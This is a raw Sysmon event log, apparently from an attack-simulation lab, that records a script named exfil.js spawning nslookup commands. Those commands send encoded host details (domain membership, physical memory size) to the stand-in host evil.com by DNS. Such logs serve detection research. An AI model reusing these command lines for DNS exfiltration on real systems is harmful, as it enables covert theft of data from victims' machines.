14:21:23.901{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.901{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E3-629A-8142-000000005F02}5352C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.901{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.901{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.901{2E1864BB-18E3-629A-7F42-000000005F02}59685232C:\Windows\system32\cmd.exe{2E1864BB-18E3-629A-8142-000000005F02}5352C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.907{2E1864BB-18E3-629A-8142-000000005F02}5352C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E3-629A-7F42-000000005F02}5968C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkfuh.tmp 2>&1 10341000x8000000000000000206200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.846{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E3-629A-8042-000000005F02}7808C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.846{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E3-629A-8042-000000005F02}7808C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.815{2E1864BB-18E3-629A-8042-000000005F02}78083008C:\Windows\system32\conhost.exe{2E1864BB-18E3-629A-7F42-000000005F02}5968C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.799{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E3-629A-8042-000000005F02}7808C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.768{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E3-629A-7F42-000000005F02}5968C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.768{2E1864BB-18E0-629A-6742-000000005F02}39762260C:\Windows\System32\WScript.exe{2E1864BB-18E3-629A-7F42-000000005F02}5968C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.768{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.768{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.768{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.768{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.780{2E1864BB-18E3-629A-7F42-000000005F02}5968C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkfuh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.766{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnjp.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.729{2E1864BB-18E3-629A-7D42-000000005F02}81006864C:\Windows\system32\conhost.exe{2E1864BB-18E3-629A-7E42-000000005F02}6824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.729{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.729{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.729{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.729{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.729{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E3-629A-7E42-000000005F02}6824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.729{2E1864BB-18E3-629A-7C42-000000005F02}81284796C:\Windows\system32\cmd.exe{2E1864BB-18E3-629A-7E42-000000005F02}6824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.733{2E1864BB-18E3-629A-7E42-000000005F02}6824C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E3-629A-7C42-000000005F02}8128C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnjp.tmp 2>&1 10341000x8000000000000000206180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.666{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E3-629A-7D42-000000005F02}8100C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.666{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E3-629A-7D42-000000005F02}8100C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.662{2E1864BB-18E3-629A-7D42-000000005F02}81006864C:\Windows\system32\conhost.exe{2E1864BB-18E3-629A-7C42-000000005F02}8128C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.628{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E3-629A-7D42-000000005F02}8100C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 